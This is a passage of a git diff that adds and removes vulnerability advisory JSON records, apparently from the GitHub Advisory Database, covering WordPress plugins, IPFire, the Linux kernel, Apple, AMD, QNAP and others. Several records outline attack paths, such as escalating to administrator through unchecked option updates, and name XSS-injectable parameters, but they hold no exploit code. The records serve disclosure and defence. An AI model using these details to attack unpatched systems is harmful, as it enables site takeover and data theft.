"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25905" - }, - { - "type": "WEB", - "url": "https://research.jfrog.com/vulnerabilities/mcp-run-python-lack-of-isolation-mcp-takeover-jfsa-2026-001653030" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-653" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T09:16:34Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json b/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json new file mode 100644 index 0000000000000..1b19394ee1523 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfx5-88f6-hhwx/GHSA-pfx5-88f6-hhwx.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfx5-88f6-hhwx", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0912" + ], + "details": "The Toret Manager plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'trman_save_option' function and on the 'trman_save_option_items' in all versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0912" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/toret-manager/tags/1.2.7/admin/class-toret-manager-admin.php#L210" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/toret-manager/tags/1.2.7/admin/class-toret-manager-admin.php#L227" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2fc891-f3c6-4f4f-ad52-0a1a949eed25?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json new file mode 100644 index 0000000000000..df52a38062973 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgcw-657p-x286/GHSA-pgcw-657p-x286.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgcw-657p-x286", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-1344" + ], + "details": "Tanium addressed an insecure file permissions vulnerability in Enforce Recovery Key Portal.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1344" + }, + { + "type": "WEB", + "url": "https://security.tanium.com/TAN-2026-003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T00:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json b/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json new file mode 100644 index 0000000000000..c0811583a9ffc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgfc-hgqj-gfc4/GHSA-pgfc-hgqj-gfc4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgfc-hgqj-gfc4", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25398" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple cross-site scripting vulnerabilities in the ovpnmain.cgi script that allow attackers to inject malicious scripts through VPN configuration parameters. Attackers can submit POST requests with script payloads in parameters like VPN_IP, DMTU, ccdname, ccdsubnet, DOVPN_SUBNET, DHCP_DOMAIN, DHCP_DNS, DHCP_WINS, ROUTES_PUSH, FRAGMENT, KEEPALIVE_1, and KEEPALIVE_2 to execute arbitrary JavaScript in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25398" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-cross-site-scripting-via-ovpnma" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json b/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json new file mode 100644 index 0000000000000..5405924cf00d6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pgvj-v9hv-3j6x/GHSA-pgvj-v9hv-3j6x.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgvj-v9hv-3j6x", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-15041" + ], + "details": "The BackWPup – WordPress Backup & Restore Plugin plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the save_site_option() function in all versions up to, and including, 5.6.2. This makes it possible for authenticated attackers, with level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15041" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.1/src/Jobs/API/Rest.php?marks=88,337,788-812#L88" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3443073%40backwpup&new=3443073%40backwpup&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ab8f440-2910-41a3-8bbc-afb4cafd33b5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phfr-35gx-vf86/GHSA-phfr-35gx-vf86.json b/advisories/unreviewed/2026/02/GHSA-phfr-35gx-vf86/GHSA-phfr-35gx-vf86.json new file mode 100644 index 0000000000000..465e331c1efd4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phfr-35gx-vf86/GHSA-phfr-35gx-vf86.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phfr-35gx-vf86", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23162" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/nvm: Fix double-free on aux add failure\n\nAfter a successful auxiliary_device_init(), aux_dev->dev.release\n(xe_nvm_release_dev()) is responsible for the kfree(nvm). When\nthere is failure with auxiliary_device_add(), driver will call\nauxiliary_device_uninit(), which call put_device(). So that the\n.release callback will be triggered to free the memory associated\nwith the auxiliary_device.\n\nMove the kfree(nvm) into the auxiliary_device_init() failure path\nand remove the err goto path to fix below error.\n\n\"\n[ 13.232905] ==================================================================\n[ 13.232911] BUG: KASAN: double-free in xe_nvm_init+0x751/0xf10 [xe]\n[ 13.233112] Free of addr ffff888120635000 by task systemd-udevd/273\n\n[ 13.233120] CPU: 8 UID: 0 PID: 273 Comm: systemd-udevd Not tainted 6.19.0-rc2-lgci-xe-kernel+ #225 PREEMPT(voluntary)\n...\n[ 13.233125] Call Trace:\n[ 13.233126] \n[ 13.233127] dump_stack_lvl+0x7f/0xc0\n[ 13.233132] print_report+0xce/0x610\n[ 13.233136] ? kasan_complete_mode_report_info+0x5d/0x1e0\n[ 13.233139] ? xe_nvm_init+0x751/0xf10 [xe]\n...\n\"\n\nv2: drop err goto path. (Alexander)\n\n(cherry picked from commit a3187c0c2bbd947ffff97f90d077ac88f9c2a215)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23162" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/32887d8e4bc0696b3cb6c5915a42b39cfd3434f4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8a44241b0b83a6047c5448da1fff03fcc29496b5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phm2-hj55-m6f6/GHSA-phm2-hj55-m6f6.json b/advisories/unreviewed/2026/02/GHSA-phm2-hj55-m6f6/GHSA-phm2-hj55-m6f6.json new file mode 100644 index 0000000000000..c22f0a8d12317 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phm2-hj55-m6f6/GHSA-phm2-hj55-m6f6.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phm2-hj55-m6f6", + "modified": "2026-02-13T21:31:39Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2024-34157" + ], + "details": "Rejected reason: reserved but not needed", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34157" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json new file mode 100644 index 0000000000000..4bcf8b83f90d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqg-p332-q7vc", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23212" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: annotate data-races around slave->last_rx\n\nslave->last_rx and slave->target_last_arp_rx[...] can be read and written\nlocklessly. Add READ_ONCE() and WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in bond_rcv_validate / bond_rcv_validate\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 1:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n...\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 0:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n br_netif_receive_skb net/bridge/br_input.c:30 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n...\n\nvalue changed: 0x0000000100005365 -> 0x0000000100005366", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23212" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c0be3277e7aefb2f900fc37ca3fe7df362e26f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a7516cb0165926d308187e231ccd330e5e3ebff7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b956289b83887e0a306067b6003c3fcd81bfdf84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd98324e327e41de04b13e372cc16f73150df254" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f6c3665b6dc53c3ab7d31b585446a953a74340ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json b/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json new file mode 100644 index 0000000000000..a1e585053744d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phxq-q7wq-8353/GHSA-phxq-q7wq-8353.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phxq-q7wq-8353", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-26041" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26041" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json new file mode 100644 index 0000000000000..6a94e565ad909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj33-46c7-rm7p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2023" + ], + "details": "The WP Plugin Info Card plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing nonce validation in the ajax_save_custom_plugin() function, which is disabled by prefixing the check with 'false &&'. This makes it possible for unauthenticated attackers to create or modify custom plugin entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2023" + }, + { + "type": "WEB", + "url": "https://github.com/DLXPlugins/wp-plugin-info-card/blob/0fe50d3ccb3d61d5d176fab9e9f280ac8bfd8614/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/tags/6.2.0/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/trunk/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3454992%40wp-plugin-info-card&new=3454992%40wp-plugin-info-card&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1213a21f-a9c1-4da3-99b5-4a5a0673073f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json b/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json new file mode 100644 index 0000000000000..294b759e004fb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj3r-q6m4-wfcw/GHSA-pj3r-q6m4-wfcw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj3r-q6m4-wfcw", + "modified": "2026-02-12T18:30:24Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-52533" + ], + "details": "Improper Access Control in an on-chip debug interface could allow a privileged attacker to enable a debug interface and potentially compromise data confidentiality or integrity.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52533" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3023.html" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json new file mode 100644 index 0000000000000..49c817839a0d7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjf9-xcq9-w388", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2026-22894" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22894" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pjvx-fh86-c22p/GHSA-pjvx-fh86-c22p.json b/advisories/unreviewed/2026/02/GHSA-pjvx-fh86-c22p/GHSA-pjvx-fh86-c22p.json new file mode 100644 index 0000000000000..045e139653be6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pjvx-fh86-c22p/GHSA-pjvx-fh86-c22p.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjvx-fh86-c22p", + "modified": "2026-02-14T18:30:14Z", + "published": "2026-02-14T18:30:14Z", + "aliases": [ + "CVE-2026-23132" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/bridge: synopsys: dw-dp: fix error paths of dw_dp_bind\n\nFix several issues in dw_dp_bind() error handling:\n\n1. Missing return after drm_bridge_attach() failure - the function\n continued execution instead of returning an error.\n\n2. Resource leak: drm_dp_aux_register() is not a devm function, so\n drm_dp_aux_unregister() must be called on all error paths after\n aux registration succeeds. This affects errors from:\n - drm_bridge_attach()\n - phy_init()\n - devm_add_action_or_reset()\n - platform_get_irq()\n - devm_request_threaded_irq()\n\n3. Bug fix: platform_get_irq() returns the IRQ number or a negative\n error code, but the error path was returning ERR_PTR(ret) instead\n of ERR_PTR(dp->irq).\n\nUse a goto label for cleanup to ensure consistent error handling.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23132" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1a0f69e3c28477b97d3609569b7e8feb4b6162e8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/569ed6a73e927a34cae4ae6de1464c0737a5ec44" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json b/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json deleted file mode 100644 index 594168f8d2b1b..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-pm44-x5x7-24c4/GHSA-pm44-x5x7-24c4.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pm44-x5x7-24c4", - "modified": "2026-02-09T12:30:22Z", - "published": "2026-02-09T12:30:22Z", - "aliases": [ - "CVE-2026-22922" - ], - "details": "Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access. \n\nUsers are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22922" - }, - { - "type": "WEB", - "url": "https://github.com/apache/airflow/pull/60412" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread/gdb7vffhpmrj5hp1j0oj1j13o4vmsq40" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-648" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T11:16:13Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json new file mode 100644 index 0000000000000..fac368002aa55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm8v-w3f2-2hxx", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2026-2126" + ], + "details": "The User Submitted Posts – Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 20260113. This is due to the `usp_get_submitted_category()` function accepting user-submitted category IDs from the POST body without validating them against the admin-configured allowed categories stored in `usp_options['categories']`. This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones, by crafting a direct POST request with manipulated `user-submitted-category[]` values, bypassing the frontend category restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3463696%40user-submitted-posts%2Ftrunk&old=3456521%40user-submitted-posts%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json new file mode 100644 index 0000000000000..1c90d7d688765 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmfg-h9xp-96jh/GHSA-pmfg-h9xp-96jh.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmfg-h9xp-96jh", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20675" + ], + "details": "The issue was addressed with improved bounds checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may lead to disclosure of user information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20675" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125", + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json new file mode 100644 index 0000000000000..49934160ef248 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json 